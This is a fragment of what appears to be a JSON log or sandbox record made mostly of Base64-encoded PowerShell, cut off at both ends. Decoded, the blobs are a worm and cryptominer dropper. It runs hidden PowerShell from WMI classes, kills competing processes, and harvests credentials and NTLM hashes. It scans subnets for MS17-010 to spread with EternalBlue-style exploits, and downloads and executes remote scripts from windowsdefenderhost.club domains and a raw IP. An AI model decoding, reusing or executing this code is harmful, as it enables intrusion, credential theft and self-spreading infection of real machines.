LQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuA